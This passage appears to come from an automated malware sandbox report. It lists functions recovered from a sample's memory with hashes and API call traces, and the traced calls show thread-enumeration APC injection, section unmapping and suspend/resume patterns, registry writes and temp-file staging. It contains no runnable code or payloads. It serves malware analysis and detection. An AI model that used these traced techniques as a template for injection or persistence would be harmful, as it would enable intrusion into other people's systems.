    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
